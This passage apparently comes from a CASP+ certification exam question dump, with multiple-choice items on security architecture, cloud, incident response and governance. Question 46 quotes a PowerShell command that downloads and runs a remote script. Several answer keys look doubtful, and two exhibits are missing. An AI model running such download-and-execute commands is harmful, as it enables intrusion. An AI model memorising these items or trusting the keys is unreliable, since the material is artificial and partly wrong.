CISO would also like to be able to alert the individual who is entering the area that</p><p>the access was logged and monitored.</p><p>Which of the following would meet these requirements?</p><p>A. Near-field communication</p><p>B. Short Message Service</p><p>C. Geofencing</p><p>D. Bluetooth</p><p>Answer: C</p><p>Explanation:</p><p>Geofencing is a location-based service that allows an organization to define and enforce a</p><p>virtual boundary around a sensitive area, such as a data center. Geofencing can use various</p><p>technologies, such as GPS, Wi-Fi, cellular data, or RFID, to detect when a mobile device enters</p><p>or exits the geofence. Geofencing can also trigger certain actions or notifications based on the</p><p>device’s location. For example, the organization can set up a geofencing policy that sends an</p><p>alert to the CISO and the device user when a mobile device enters the data center area.</p><p>Geofencing can also be used to restrict access to certain apps or features based on the</p><p>device’s</p><p>location.</p><p>Verified Reference:</p><p>15 / 44</p><p>https://developer.android.com/training/location/geofencing</p><p>https://www.manageengine.com/mobile-device-management/mdm-geofencing.html</p><p>https://www.koombea.com/blog/mobile-geofencing/</p><p>25. Which of the following objectives BEST supports leveraging tabletop exercises in business</p><p>continuity planning?</p><p>A. Determine the optimal placement of hot/warm sites within the enterprise architecture.</p><p>B. Create new processes for identified gaps in continuity planning.</p><p>C. Establish new staff roles and responsibilities for continuity of operations.</p><p>D. Assess the effectiveness of documented processes against a realistic scenario.</p><p>Answer: D</p><p>26. A company is migrating from company-owned phones to a BYOD strategy for mobile</p><p>devices. The pilot program will start with the executive management team and be rolled out to</p><p>the rest of the staff in phases. The company’s Chief Financial Officer loses a phone multiple</p><p>times a year.</p><p>Which of the following will MOST likely secure the data on the lost device?</p><p>A. Require a VPN to be active to access company data.</p><p>B. Set up different profiles based on the person’s risk.</p><p>C. Remotely wipe the device.</p><p>D. Require MFA to access company applications.</p><p>Answer: C</p><p>Explanation:</p><p>Remotely wiping the device is the best way to secure the data on the lost device, as it would</p><p>erase all the data and prevent unauthorized access. Requiring a VPN to be active to access</p><p>company data may not protect the data on the device itself, as it could be stored locally or</p><p>cached. Setting up different profiles based on the person’s risk may not prevent data loss or</p><p>theft, as it depends on the level of access and encryption. Requiring MFA to access company</p><p>applications may not protect the data on the device itself, as it could be stored locally or cached.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-byod</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>27. The Chief information Officer (CIO) wants to establish a non-banding agreement with a third</p><p>party that outlines the objectives of the mutual arrangement dealing with data transfers between</p><p>both organizations before establishing a format partnership.</p><p>16 / 44</p><p>Which of the follow would MOST likely be used?</p><p>A. MOU</p><p>B. OLA</p><p>C. NDA</p><p>D. SLA</p><p>Answer: A</p><p>28. A system administrator at a medical imaging company discovers protected health</p><p>information (PHI) on a general-purpose file server.</p><p>Which of the following steps should the administrator take NEXT?</p><p>A. Isolate all of the PHI on its own VLAN and keep it segregated at Layer 2.</p><p>B. Take an MD5 hash of the server.</p><p>C. Delete all PHI from the network until the legal department is consulted.</p><p>D. Consult the legal department to determine the legal requirements.</p><p>Answer: A</p><p>29. A security analyst is reviewing the following output:</p><p>Which of the following would BEST mitigate this type of attack?</p><p>A. Installing a network firewall</p><p>B. Placing a WAF inline</p><p>C. Implementing an IDS</p><p>D. Deploying</p><p>a honeypot</p><p>Answer: B</p><p>Explanation:</p><p>17 / 44</p><p>The output shows a SQL injection attack that is trying to exploit a web application. A WAF (Web</p><p>Application Firewall) is a security solution that can detect and block malicious web requests,</p><p>such as SQL injection, XSS, CSRF, etc. Placing a WAF inline would prevent the attack from</p><p>reaching the web server and database.</p><p>Reference:</p><p>https://owasp.org/www-community/attacks/SQL_Injection</p><p>https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/</p><p>30. A major broadcasting company that requires continuous availability to streaming content</p><p>needs to be resilient against DDoS attacks.</p><p>Which of the following is the MOST important infrastructure security design element to prevent</p><p>an outage?</p><p>A. Supporting heterogeneous architecture</p><p>B. Leveraging content delivery network across multiple regions</p><p>C. Ensuring cloud autoscaling is in place</p><p>D. Scaling horizontally to handle increases in traffic</p><p>Answer: B</p><p>Explanation:</p><p>A content delivery network (CDN) is a distributed system of servers that delivers web content to</p><p>users based on their geographic location, the origin of the content, and the performance of the</p><p>network. A CDN can help improve the availability and performance of web applications by</p><p>caching content closer to the users, reducing latency and bandwidth consumption. A CDN can</p><p>also help mitigate distributed denial-of-service (DDoS) attacks by absorbing or filtering malicious</p><p>traffic before it reaches the origin servers, reducing the impact on the application availability.</p><p>Supporting heterogeneous architecture means using different types of hardware, software, or</p><p>platforms in an IT environment. This can help improve resilience by reducing single points of</p><p>failure and increasing compatibility, but it does not directly prevent DDoS attacks. Ensuring</p><p>cloud autoscaling is in place means using cloud services that automatically adjust the amount of</p><p>resources allocated to an application based on the demand or load. This can help improve</p><p>scalability and performance by providing more resources when needed, but it does not directly</p><p>prevent DDoS attacks. Scaling horizontally means adding more servers or nodes to an IT</p><p>environment to increase its capacity or throughput. This can help improve scalability and</p><p>performance by distributing the load across multiple servers, but it does not directly prevent</p><p>DDoS attacks.</p><p>Reference: [CompTIA Advanced Security Practitioner (CASP+) Certification Exam Objectives],</p><p>Domain 2: Enterprise Security Architecture, Objective 2.4: Select controls based on systems</p><p>18 / 44</p><p>security evaluation models</p><p>31. An application developer is including third-party background security fixes in an application.</p><p>The fixes seem to resolve a currently identified security issue. However, when the application is</p><p>released to the public, report come In that a previously vulnerability has returned.</p><p>Which of the following should the developer integrate into the process to BEST prevent this type</p><p>of behavior?</p><p>A. Peer review</p><p>B. Regression testing</p><p>C. User acceptance</p><p>D. Dynamic analysis</p><p>Answer: A</p><p>32. Which of the following testing plans is used to discuss disaster recovery scenarios with</p><p>representatives from multiple departments within an incident response team but without taking</p><p>any invasive actions?</p><p>A. Disaster recovery checklist</p><p>B. Tabletop exercise</p><p>C. Full interruption test</p><p>D. Parallel test</p><p>Answer: B</p><p>Explanation:</p><p>A tabletop exercise is a type of testing plan that is used to discuss disaster recovery scenarios</p><p>with representatives from multiple departments within an incident response team but without</p><p>taking any invasive actions. A tabletop exercise is a simulation of a potential disaster or incident</p><p>that involves a verbal or written discussion of how each department would respond to it. The</p><p>purpose of a tabletop exercise is to identify gaps, weaknesses, or conflicts in the disaster</p><p>recovery plan, and to improve communication and coordination among the team members.</p><p>Reference: [CompTIA CASP+ Study Guide, Second Edition, page 455]</p><p>33. A security architect is implementing a web application that uses a database back end. Prior</p><p>to the production, the architect is concerned about the possibility of XSS attacks and wants to</p><p>identify security controls that could be put in place to prevent these attacks.</p><p>Which of the following sources could the architect consult to address this security concern?</p><p>A. SDLC</p><p>B. OVAL</p><p>19 / 44</p><p>C. IEEE</p><p>D. OWASP</p><p>Answer: D</p><p>Explanation:</p><p>OWASP is a resource used to identify attack vectors and their mitigations, OVAL is a</p><p>vulnerability assessment standard</p><p>OWASP (Open Web Application Security Project) is a source that the security architect could</p><p>consult to address the security concern of XSS (cross-site scripting) attacks on a web</p><p>application that uses a database back end. OWASP is a non-profit organization that provides</p><p>resources and guidance for improving the security of web applications and services. OWASP</p><p>publishes the OWASP Top 10 list of common web application vulnerabilities and risks, which</p><p>includes XSS attacks, as well as recommendations and best practices for preventing or</p><p>mitigating them. SDLC (software development life cycle) is not a source for addressing XSS</p><p>attacks, but a framework for developing software in an organized and efficient manner. OVAL</p><p>(Open Vulnerability and Assessment Language) is not a source for addressing XSS attacks, but</p><p>a standard for expressing system configuration information and vulnerabilities. IEEE (Institute of</p><p>Electrical and Electronics Engineers) is not a source for addressing XSS attacks, but an</p><p>organization that develops standards for various fields of engineering and technology.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-owasp</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>34. A security officer is requiring all personnel working on a special project to obtain a security</p><p>clearance requisite with the level of all information being accessed Data on this network must be</p><p>protected at the same level of each clearance holder The need to know must be vended by the</p><p>data owner.</p><p>Which of the following should the security officer do to meet these requirements?</p><p>A. Create a rule lo authorize personnel only from certain IPs to access the files</p><p>B. Assign labels to the files and require formal access authorization</p><p>C. Assign attributes to each file and allow authorized users to share the files</p><p>D. Assign roles to users and authorize access to files based on the roles</p><p>Answer: B</p><p>Explanation:</p><p>Labeling files and requiring formal access authorization is a method that aligns with the principle</p><p>of least privilege and the need-to-know basis. By assigning labels to files based on their</p><p>sensitivity and requiring formal access approval from the data owner, the security officer can</p><p>20 / 44</p><p>ensure that only personnel with the necessary clearance and a legitimate need to access the</p><p>information can do so. This approach helps in maintaining data confidentiality and integrity in</p><p>line with the project's security requirements.</p><p>35. An attacker infiltrated an electricity-generation site and disabled the safety instrumented</p><p>system. Ransomware was also deployed on the engineering workstation. The environment has</p><p>back-to-back firewalls separating the corporate and OT systems.</p><p>Which of the following is the MOST likely security consequence of this attack?</p><p>A. A turbine would overheat and cause physical harm.</p><p>B. The engineers would need to go to the historian.</p><p>C. The SCADA equipment could not be maintained.</p><p>D. Data would be exfiltrated through the data diodes.</p><p>Answer: A</p><p>36. A hospitality company experienced a data breach that included customer Pll. The hacker</p><p>used social engineering to convince an employee to grant a third-party application access to</p><p>some company documents</p><p>within a cloud file storage service.</p><p>Which of the following is the BEST solution to help prevent this type of attack in the future?</p><p>A. NGFW for web traffic inspection and activity monitoring</p><p>B. CSPM for application configuration control</p><p>C. Targeted employee training and awareness exercises</p><p>D. CASB for OAuth application permission control</p><p>Answer: D</p><p>Explanation:</p><p>The company should use CASB for OAuth application permission control to help prevent this</p><p>type of attack in the future. CASB stands for cloud access security broker, which is a software</p><p>tool that monitors and enforces security policies for cloud applications. CASB can help control</p><p>which third-party applications can access the company’s cloud file storage service and what</p><p>permissions they have. CASB can also detect and block any unauthorized or malicious</p><p>applications that try to access the company’s data.</p><p>Verified Reference:</p><p>https://www.kaspersky.com/resource-center/threats/how-to-avoid-social-engineering-attacks</p><p>https://www.eccouncil.org/cybersecurity-exchange/ethical-hacking/understanding-preventing-</p><p>social-engineering-attacks/</p><p>https://www.indusface.com/blog/10-ways-businesses-can-prevent-social-engineering-attacks/</p><p>21 / 44</p><p>37. An internal security audit determines that Telnet is currently being used within the</p><p>environment to manage network switches.</p><p>Which of the following tools should be utilized to identify credentials in plaintext that are used to</p><p>log in to these devices?</p><p>A. Fuzzer</p><p>B. Network traffic analyzer</p><p>C. HTTP interceptor</p><p>D. Port scanner</p><p>E. Password cracker</p><p>Answer: B</p><p>Explanation:</p><p>A network traffic analyzer (also known as a packet sniffer) is the best tool to identify credentials</p><p>being transmitted in plaintext, such as those used in Telnet sessions. Since Telnet transmits</p><p>data without encryption, a network traffic analyzer can capture the traffic between the client and</p><p>the network switches, revealing sensitive information, including login credentials, in clear text.</p><p>This tool helps identify insecure protocols and enables remediation by switching to encrypted</p><p>alternatives like SSH. CASP+ highlights the importance of using secure protocols and tools like</p><p>traffic analyzers to identify vulnerabilities in network communications.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations</p><p>(Network Traffic Analysis and Insecure Protocols)</p><p>CompTIA CASP+ Study Guide: Monitoring Network Traffic for Plaintext Credentials</p><p>38. A development team created a mobile application that contacts a company’s back-end APIs</p><p>housed in a PaaS environment. The APIs have been experiencing high processor utilization due</p><p>to scraping activities. The security engineer needs to recommend a solution that will prevent</p><p>and remedy the behavior.</p><p>Which of the following would BEST safeguard the APIs? (Choose two.)</p><p>A. Bot protection</p><p>B. OAuth 2.0</p><p>C. Input validation</p><p>D. Autoscaling endpoints</p><p>E. Rate limiting</p><p>F. CSRF protection</p><p>Answer: D, E</p><p>Explanation:</p><p>Reference: https://stackoverflow.com/questions/3161548/how-do-i-prevent-site-scraping</p><p>22 / 44</p><p>39. A company’s Chief Information Security Officer is concerned that the company’s proposed</p><p>move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.</p><p>Which of the following compensating controls would be BEST to implement in this situation?</p><p>A. EDR</p><p>B. SIEM</p><p>C. HIDS</p><p>D. UEBA</p><p>Answer: B</p><p>Explanation:</p><p>Reference: https://runpanther.io/cyber-explained/cloud-based-siem-explained/</p><p>40. A vulnerability scanner detected an obsolete version of an open-source file-sharing</p><p>application on one of a company’s Linux servers. While the software version is no longer</p><p>supported by the OSS community, the company’s Linux vendor backported fixes, applied them</p><p>for all current vulnerabilities, and agrees to support the software in the future.</p><p>Based on this agreement, this finding is BEST categorized as a:</p><p>A. true positive.</p><p>B. true negative.</p><p>C. false positive.</p><p>D. false negative.</p><p>Answer: C</p><p>41. A help desk technician just informed the security department that a user downloaded a</p><p>suspicious</p><p>file from internet explorer last night. The user confirmed accessing all the files and folders</p><p>before going home from work. the next morning, the user was no longer able to boot the system</p><p>and was presented a screen with a phone number. The technician then tries to boot the</p><p>computer using wake-on-LAN, but the system would not come up.</p><p>Which of the following explains why the computer would not boot?</p><p>A. The operating system was corrupted.</p><p>B. SElinux was in enforced status.</p><p>C. A secure boot violation occurred.</p><p>D. The disk was encrypted.</p><p>Answer: A</p><p>23 / 44</p><p>42. A security architect is given the following requirements to secure a rapidly changing</p><p>enterprise with an increasingly distributed and remote workforce</p><p>• Cloud-delivered services</p><p>• Full network security stack</p><p>• SaaS application security management</p><p>• Minimal latency for an optimal user experience</p><p>• Integration with the cloud 1AM platform</p><p>Which of the following is the BEST solution?</p><p>A. Routing and Remote Access Service (RRAS)</p><p>B. NGFW</p><p>C. Managed Security Service Provider (MSSP)</p><p>D. SASE</p><p>Answer: D</p><p>43. A junior developer is informed about the impact of new malware on an Advanced RISC</p><p>Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the</p><p>malware is able to insert itself in another process memory location.</p><p>Which of the following technologies can the developer enable on the ARM architecture to</p><p>prevent this type of malware?</p><p>A. Execute never</p><p>B. No-execute</p><p>C. Total memory encryption</p><p>D. Virtual memory encryption</p><p>Answer: A</p><p>Explanation:</p><p>Execute never is a technology that can be enabled on the ARM architecture to prevent malware</p><p>from inserting itself in another process memory location and executing code. Execute never is a</p><p>feature that allows each memory region to be tagged as not containing executable code by</p><p>setting the execute never (XN) bit in the translation table entry. If the XN bit is set to 1, then any</p><p>attempt to execute an instruction in that region results in a permission fault. If the XN bit is</p><p>cleared to 0, then code can execute from that memory region. Execute never also prevents</p><p>speculative instruction fetches from memory regions that are marked as non-executable, which</p><p>can avoid undesirable side-effects or vulnerabilities. By enabling execute never, the developer</p><p>can protect the process memory from being hijacked by malware.</p><p>Verified Reference:</p><p>https://developer.arm.com/documentation/ddi0360/f/memory-management-unit/memory-access-</p><p>24 / 44</p><p>control/execute-never-bits</p><p>https://developer.arm.com/documentation/den0013/d/The-Memory-Management-Unit/Memory-</p><p>attributes/Execute-Never</p><p>https://developer.arm.com/documentation/ddi0406/c/System-Level-Architecture/Virtual-Memory-</p><p>System-ArchitectureCVMSA-/Memory-access-control/Execute-never-restrictions-on-instruction-</p><p>fetching</p><p>44. A pharmaceutical company recently experienced a security breach within its customer-</p><p>facing web portal. The attackers performed a SQL injection attack and exported tables from the</p><p>company’s managed database, exposing customer information.</p><p>The company hosts the application with a CSP utilizing the IaaS model.</p><p>Which of the following parties is ultimately responsible for the breach?</p><p>A. The pharmaceutical company</p><p>B. The cloud software provider</p><p>C. The web portal software vendor</p><p>D. The database software vendor</p><p>Answer: A</p><p>45. A security engineer needs to recommend a solution that will meet the following</p><p>requirements:</p><p>Identify sensitive data in the provider’s network</p><p>Maintain compliance with company and regulatory guidelines</p><p>Detect and respond to insider threats, privileged user threats, and compromised accounts</p><p>Enforce datacentric security, such as encryption, tokenization, and access control</p><p>Which of the following solutions</p><p>should the security engineer recommend to address these</p><p>requirements?</p><p>A. WAF</p><p>B. CASB</p><p>C. SWG</p><p>D. DLP</p><p>Answer: D</p><p>Explanation:</p><p>DLP (data loss prevention) is a solution that can meet the following requirements: identify</p><p>sensitive data in the provider’s network, maintain compliance with company and regulatory</p><p>guidelines, detect and respond to insider threats, privileged user threats, and compromised</p><p>accounts, and enforce data-centric security, such as encryption, tokenization, and access</p><p>25 / 44</p><p>control. DLP can monitor, classify, and protect data in motion, at rest, or in use, and prevent</p><p>unauthorized disclosure or exfiltration. WAF (web application firewall) is a solution that can</p><p>protect web applications from common attacks, such as SQL injection or cross-site scripting, but</p><p>it does not address the requirements listed. CASB (cloud access security broker) is a solution</p><p>that can enforce policies and controls for accessing cloud services and applications, but it does</p><p>not address the requirements listed. SWG (secure web gateway) is a solution that can monitor</p><p>and filter web traffic to prevent malicious or unauthorized access, but it does not address the</p><p>requirements listed.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-data-loss-prevention</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guid</p><p>46. A security analyst has noticed a steady increase in the number of failed login attempts to the</p><p>external-facing mail server. During an investigation of one of the jump boxes, the analyst</p><p>identified the following in the log file: powershell EX(New-Object</p><p>Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois</p><p>Which of the following security controls would have alerted and prevented the next phase of the</p><p>attack?</p><p>A. Antivirus and UEBA</p><p>B. Reverse proxy and sandbox</p><p>C. EDR and application approved list</p><p>D. Forward proxy and MFA</p><p>Answer: C</p><p>Explanation:</p><p>An EDR and whitelist should protect from this attack.</p><p>47. A company underwent an audit in which the following issues were enumerated:</p><p>• Insufficient security controls for internet-facing services, such as VPN and extranet</p><p>• Weak password policies governing external access for third-party vendors</p><p>Which of the following strategies would help mitigate the risks of unauthorized access?</p><p>A. 2FA</p><p>B. RADIUS</p><p>C. Federation</p><p>D. OTP</p><p>Answer: A</p><p>Explanation:</p><p>26 / 44</p><p>Two-factor authentication (2FA) adds an additional layer of security by requiring two forms of</p><p>identification before granting access to an account or system. Implementing 2FA can</p><p>significantly reduce the risk of unauthorized access, even if passwords are weak or</p><p>compromised.</p><p>48. A software developer has been tasked with creating a unique threat detection mechanism</p><p>that is based on machine learning. The information system for which the tool is being developed</p><p>is on a rapid CI/CD pipeline, and the tool developer is considered a supplier to the process.</p><p>Which of the following presents the most risk to the development life cycle and lo the ability to</p><p>deliver the security tool on time?</p><p>A. Deep learning language barriers</p><p>B. Big Data processing required for maturity</p><p>C. Secure, multiparty computation requirements</p><p>D. Computing capabilities available to the developer</p><p>Answer: B</p><p>Explanation:</p><p>The most significant risk to the development of a machine-learning-based threat detection tool is</p><p>the Big Data processing required for maturity. Machine learning models often require large</p><p>datasets to train effectively, and processing and analyzing this data can be time-consuming and</p><p>resource-intensive. This can delay the development timeline, especially in a rapid CI/CD</p><p>pipeline environment where timely delivery is crucial. CASP+ highlights the challenges</p><p>associated with machine learning and Big Data in security tool development, particularly the</p><p>resource demands and the need for extensive data to ensure accuracy and maturity.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations</p><p>(Big Data and Machine Learning Challenges)</p><p>CompTIA CASP+ Study Guide: Implementing and Managing Machine Learning in Security</p><p>Environments</p><p>49. A company has been the target of LDAP injections, as well as brute-force, whaling, and</p><p>spear-phishing attacks. The company is concerned about ensuring continued system access.</p><p>The company has already implemented a SSO system with strong passwords.</p><p>Which of the following additional controls should the company deploy?</p><p>A. Two-factor authentication</p><p>B. Identity proofing</p><p>C. Challenge questions</p><p>D. Live identity verification</p><p>27 / 44</p><p>Answer: A</p><p>Explanation:</p><p>While the company has implemented Single Sign-On (SSO) with strong passwords, additional</p><p>security controls are required to mitigate attacks such as LDAP injections, brute-force, whaling,</p><p>and spear-phishing. Two-factor authentication (2FA) provides an additional layer of security by</p><p>requiring users to provide two different forms of authentication (e.g., a password and a security</p><p>token or a biometric factor), reducing the likelihood of unauthorized access even if passwords</p><p>are compromised. CASP+ emphasizes the importance of using multi-factor authentication</p><p>mechanisms to strengthen access control and protect against such attacks.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations</p><p>(Access Control and Multi-factor Authentication)</p><p>CompTIA CASP+ Study Guide: Implementing Two-Factor Authentication for System Access</p><p>50. Which of the following is a benefit of using steganalysis techniques in forensic response?</p><p>A. Breaking a symmetric cipher used in secure voice communications</p><p>B. Determining the frequency of unique attacks against DRM-protected media</p><p>C. Maintaining chain of custody for acquired evidence</p><p>D. Identifying least significant bit encoding of data in a .wav file</p><p>Answer: D</p><p>Explanation:</p><p>Steganalysis is the process of detecting hidden data in files or media, such as images, audio, or</p><p>video. One technique of steganalysis is to identify least significant bit encoding, which is a</p><p>method of hiding data by altering the least significant bits of each byte in a file. For example, a</p><p>.wav file could contain hidden data encoded in the least significant bits of each audio sample.</p><p>Steganalysis techniques can help forensic responders to discover hidden evidence or malicious</p><p>payloads. Breaking a symmetric cipher, determining the frequency of attacks, or maintaining</p><p>chain of custody are not related to steganalysis.</p><p>Verified Reference: https://www.comptia.org/blog/what-is-steganography</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>51. Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?</p><p>A. Isolation control failure</p><p>B. Management plane breach</p><p>C. Insecure data deletion</p><p>D. Resource exhaustion</p><p>Answer: B</p><p>28 / 44</p><p>52. A client is adding scope to a project.</p><p>Which of the following processes should be used when requesting updates or corrections to the</p><p>client's systems?</p><p>A. The implementation engineer requests direct approval from the systems engineer and the</p><p>Chief Information Security Officer.</p><p>B. The change control board must review and approve a submission.</p><p>C. The information system security officer provides the systems engineer with the system</p><p>updates.</p><p>D. The security engineer asks the project manager to review the updates for the client's system.</p><p>Answer: B</p><p>Explanation:</p><p>The change control board (CCB) is a committee that consists of subject matter experts and</p><p>managers who decide whether to implement proposed changes to a project. The change control</p><p>board is part of the change management plan, which defines the roles and processes for</p><p>managing change within a team or organization. The change control board must review and</p><p>approve a submission for any change request that affects the</p><p>scope, schedule, budget, quality,</p><p>or risks of the project. The change control board evaluates the impact and benefits of the</p><p>change request and decides whether to accept, reject, or defer it.</p><p>A. The implementation engineer requesting direct approval from the systems engineer and the</p><p>Chief Information Security Officer is not a correct process for requesting updates or corrections</p><p>to the client’s systems, because it bypasses the change control board and the project manager.</p><p>This could lead to unauthorized changes that could compromise the project’s objectives and</p><p>deliverables.</p><p>C. The information system security officer providing the systems engineer with the system</p><p>updates is not a correct process for requesting updates or corrections to the client’s systems,</p><p>because it does not involve the change control board or the project manager. This could lead to</p><p>unauthorized changes that could introduce security vulnerabilities or conflicts with other system</p><p>components.</p><p>D. The security engineer asking the project manager to review the updates for the client’s</p><p>system is not a correct process for requesting updates or corrections to the client’s systems,</p><p>because it does not involve the change control board. The project manager is responsible for</p><p>facilitating the change management process, but not for approving or rejecting change requests.</p><p>https://www.projectmanager.com/blog/change-control-board-roles-responsibilities-processes</p><p>53. Two companies that recently merged would like to unify application access between the</p><p>29 / 44</p><p>companies, without initially merging internal authentication stores.</p><p>Which of the following technical strategies would best meet this objective?</p><p>A. Federation</p><p>B. RADIUS</p><p>C. TACACS+</p><p>D. MFA</p><p>E. ABAC</p><p>Answer: A</p><p>Explanation:</p><p>Federation is the best strategy for unifying application access between two companies without</p><p>merging their internal authentication stores. Federation allows users from different organizations</p><p>to authenticate and access resources using their existing credentials through trusted third-party</p><p>identity providers. This enables seamless access without the need to merge or consolidate</p><p>internal authentication systems. CASP+ emphasizes federation as a key technology for</p><p>enabling cross-organizational authentication while maintaining the integrity of separate identity</p><p>stores.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations</p><p>(Federated Identity and Authentication)</p><p>CompTIA CASP+ Study Guide: Federated Identity Management for Mergers and Cross-</p><p>Company Access</p><p>54. An architectural firm is working with its security team to ensure that any draft images that</p><p>are leaked</p><p>to the public can be traced back to a specific external party.</p><p>Which of the following would BEST accomplish this goal?</p><p>A. Properly configure a secure file transfer system to ensure file integrity.</p><p>B. Have the external parties sign non-disclosure agreements before sending any images.</p><p>C. Only share images with external parties that have worked with the firm previously.</p><p>D. Utilize watermarks in the images that are specific to each external party.</p><p>Answer: D</p><p>Explanation:</p><p>Watermarking is a technique of adding an identifying image or pattern to an original image to</p><p>protect its ownership and authenticity. Watermarks can be customized to include specific</p><p>information about the external party, such as their name, logo, or date of receipt. This way, if</p><p>any draft images are leaked to the public, the firm can trace back the source of the leak and</p><p>take appropriate actions.</p><p>30 / 44</p><p>Verified Reference:</p><p>https://en.wikipedia.org/wiki/Watermark</p><p>https://www.canva.com/features/watermark-photos/</p><p>https://www.mdpi.com/2078-2489/11/2/110</p><p>55. An organization does not have visibility into when company-owned assets are off network or</p><p>not connected via a VPN. The lack of visibility prevents the organization from meeting security</p><p>and operational objectives.</p><p>Which of the following cloud-hosted solutions should the organization implement to help mitigate</p><p>the risk?</p><p>A. Antivirus</p><p>B. UEBA</p><p>C. EDR</p><p>D. HIDS</p><p>Answer: C</p><p>Explanation:</p><p>Endpoint Detection and Response (EDR) solutions provide continuous monitoring and response</p><p>to advanced threats. They can help mitigate the risk of not having visibility into off-network</p><p>activities by detecting, investigating, and responding to suspicious activities on endpoints,</p><p>regardless of their location.</p><p>56. Which of the following best describes what happens if chain of custody is broken?</p><p>A. Tracking record details are not properly labeled.</p><p>B. Vital evidence could be deemed inadmissible.</p><p>C. Evidence is not exhibited in the court of law.</p><p>D. Evidence will need to be recollected.</p><p>Answer: B</p><p>Explanation:</p><p>Chain of custody is critical in legal contexts as it documents the seizure, custody, control,</p><p>transfer, analysis, and disposition of evidence. If the chain of custody is broken, it means there</p><p>is a possibility that the evidence could have been tampered with or compromised, which can</p><p>lead to it being deemed inadmissible in court.</p><p>57. An organization has an operational requirement with a specific equipment vendor The</p><p>organization is located in the United States, but the vendor is located in another region.</p><p>Which of the following risks would be most concerning to the organization in the event of</p><p>31 / 44</p><p>equipment failure?</p><p>A. Support may not be available during all business hours</p><p>B. The organization requires authorized vendor specialists.</p><p>C. Each region has different regulatory frameworks to follow</p><p>D. Shipping delays could cost the organization money</p><p>Answer: A</p><p>Explanation:</p><p>The primary risk for an organization working with vendors in different time zones is that support</p><p>might not be available during the organization's regular business hours. This can lead to delays</p><p>in receiving necessary support or assistance when equipment issues arise, which could be</p><p>critical if there's an equipment failure.</p><p>58. Due to internal resource constraints, the management team has asked the principal security</p><p>architect to recommend a solution that shifts most of the responsibility for application-level</p><p>controls to the cloud provider.</p><p>In the shared responsibility model, which of the following levels of service meets this</p><p>requirement?</p><p>A. IaaS</p><p>B. SaaS</p><p>C. Faas</p><p>D. PaaS</p><p>Answer: B</p><p>59. An organization mat provides a SaaS solution recently experienced an incident involving</p><p>customer data loss. The system has a level of sell-healing that includes monitoring performance</p><p>and available resources. When me system detects an issue, the self-healing process is</p><p>supposed to restart pans of me software.</p><p>During the incident, when me self-healing system attempted to restart the services, available</p><p>disk space on the data drive to restart all the services was inadequate. The self-healing system</p><p>did not detect that some services did not fully restart and declared me system as fully</p><p>operational.</p><p>Which of the following BEST describes me reason why the silent failure occurred?</p><p>A. The system logs rotated prematurely.</p><p>B. The disk utilization alarms are higher than what me service restarts require.</p><p>C. The number of nodes in me self-healing cluster was healthy,</p><p>D. Conditional checks prior to the service restart succeeded.</p><p>32 / 44</p><p>Answer: D</p><p>60. A software developer created an application for a large, multinational company. The</p><p>company is concerned the program code could be reverse engineered by a foreign entity and</p><p>intellectual property would be lost.</p><p>Which of the following techniques should be used to prevent this situation?</p><p>A. Obfuscation</p><p>B. Code signing</p><p>C. Watermarking</p><p>D. Digital certificates</p><p>Answer: A</p><p>Explanation:</p><p>Obfuscation is a technique used to make the program code difficult to understand or read. It can</p><p>help to prevent reverse engineering by making it more challenging to analyze the code and</p><p>understand its</p><p>structure and functionality, thereby protecting intellectual property.</p><p>61. A threat hunting team receives a report about possible APT activity in the network.</p><p>Which of the following threat management frameworks should the team implement?</p><p>A. NIST SP 800-53</p><p>B. MITRE ATT&CK</p><p>C. The Cyber Kill Chain</p><p>D. The Diamond Model of Intrusion Analysis</p><p>Answer: B</p><p>Explanation:</p><p>MITRE ATT&CK is a threat management framework that provides a comprehensive and</p><p>detailed knowledge base of adversary tactics and techniques based on real-world observations.</p><p>It can help threat hunting teams to identify, understand, and prioritize potential threats, as well</p><p>as to develop effective detection and response strategies. MITRE ATT&CK covers the entire</p><p>lifecycle of a cyberattack, from initial access to impact, and provides information on how to</p><p>mitigate, detect, and hunt for each technique. It also includes threat actor profiles, software</p><p>descriptions, and data sources that can be used for threat intelligence and analysis.</p><p>Verified Reference:</p><p>https://attack.mitre.org/</p><p>https://resources.infosecinstitute.com/topic/top-threat-modeling-frameworks-stride-owasp-</p><p>top-10-mitre-attck-framework/</p><p>https://www.ibm.com/topics/threat-management</p><p>33 / 44</p><p>62. A company is looking at sending historical backups containing customer PII to a cloud</p><p>service provider to save on storage costs.</p><p>Which of the following is the MOST important consideration before making this decision?</p><p>A. Availability</p><p>B. Data sovereignty</p><p>C. Geography</p><p>D. Vendor lock-in</p><p>Answer: B</p><p>63. A Chief information Security Officer (CISO) is developing corrective-action plans based on</p><p>the following from a vulnerability scan of internal hosts:</p><p>Which of the following MOST appropriate corrective action to document for this finding?</p><p>A. The product owner should perform a business impact assessment regarding the ability to</p><p>implement a WAF.</p><p>B. The application developer should use a static code analysis tool to ensure any application</p><p>code is not vulnerable to buffer overflows.</p><p>C. The system administrator should evaluate dependencies and perform upgrade as necessary.</p><p>D. The security operations center should develop a custom IDS rule to prevent attacks buffer</p><p>overflows against this server.</p><p>Answer: A</p><p>64. A junior security researcher has identified a buffer overflow vulnerability leading to remote</p><p>code execution in a former employer's software. The security researcher asks for the manager's</p><p>advice on the vulnerability submission process.</p><p>Which of the following is the best advice the current manager can provide the security</p><p>researcher?</p><p>A. Collect proof that the exploit works in order to expedite the process.</p><p>B. Publish proof-of-concept exploit code on a personal blog.</p><p>34 / 44</p><p>C. Recommend legal consultation about the process.</p><p>D. Visit a bug bounty website for the latest information.</p><p>Answer: C</p><p>Explanation:</p><p>When a security 